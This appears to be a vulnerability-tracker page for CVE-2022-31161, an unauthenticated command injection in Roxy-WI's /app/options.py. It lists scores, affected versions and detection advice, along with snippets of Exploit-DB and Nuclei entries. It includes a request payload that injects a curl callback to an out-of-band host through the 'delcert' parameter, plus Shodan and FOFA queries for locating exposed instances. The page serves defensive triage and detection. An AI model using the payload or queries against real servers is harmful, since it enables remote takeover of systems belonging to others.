CVE-2022-31161
published 2022-07-15CVE-2022-31161: Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the…
PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
20.45%
97.2th percentile
Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Version 6.1.1.0 contains a patch for this issue.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hap-wi | roxy-wi | < 6.1.1.0 | 6.1.1.0 |
| roxy-wi | roxy-wi | < 6.1.1.0 | 6.1.1.0 |
Detection & IOCsextracted from sources · hover to see the quote
othershow_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20curl%20{{interactsh-url}};↗
- →Monitor for POST requests to /app/options.py containing the 'delcert' parameter with shell metacharacters (e.g., %20&%20, semicolons) indicating OS command injection attempts. ↗
- →Detect unauthenticated POST requests to /app/options.py — the exploit requires no authentication (token= is empty), making unauthenticated access to this endpoint a strong signal. ↗
- →Use Shodan/FOFA queries to identify exposed Roxy-WI instances: Shodan query 'html:"Roxy-WI"' and FOFA query 'body="roxy-wi"'. ↗
- →Look for outbound curl requests originating from the web server process shortly after a POST to /app/options.py, as the payload injects a curl command via the delcert parameter. ↗
- ·The vulnerability exists in Roxy-WI versions prior to 6.1.1.0 only; version 6.1.1.0 contains the patch. Ensure version checks are part of triage. ↗
- ·The exploit is unauthenticated (empty token field), meaning no credentials are required to trigger RCE — detection rules should not filter on authentication state. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
exploitdb·2023-04-03·CVSS 10.0
CVE-2022-31161 [CRITICAL] Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
---
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
# Date of found: 21 July 2022
# Application: Roxy WI .oastify.com;
Nuclei
Roxy-WI - Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-31161 [CRITICAL] Roxy-WI - Remote Code Execution
Roxy-WI - Remote Code Execution
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the delcert parameter without proper input validation in the /app/options.py file, allowing attackers to inject arbitrary OS commands.
Template:
id: CVE-2022-31161
info:
name: Roxy-WI - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the delcert parameter without proper input validation in the /app/options.py file, allowing attackers to inject arbitrary OS commands.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Users are adv
No writeups or analysis indexed.
http://packetstormsecurity.com/files/171652/Roxy-WI-6.1.1.0-Remote-Code-Execution.htmlhttps://github.com/hap-wi/roxy-wi/releases/tag/v6.1.1.0https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-pg3w-8p63-x483http://packetstormsecurity.com/files/171652/Roxy-WI-6.1.1.0-Remote-Code-Execution.htmlhttps://github.com/hap-wi/roxy-wi/releases/tag/v6.1.1.0https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-pg3w-8p63-x483
2022-07-15
Published
Exploited in the wild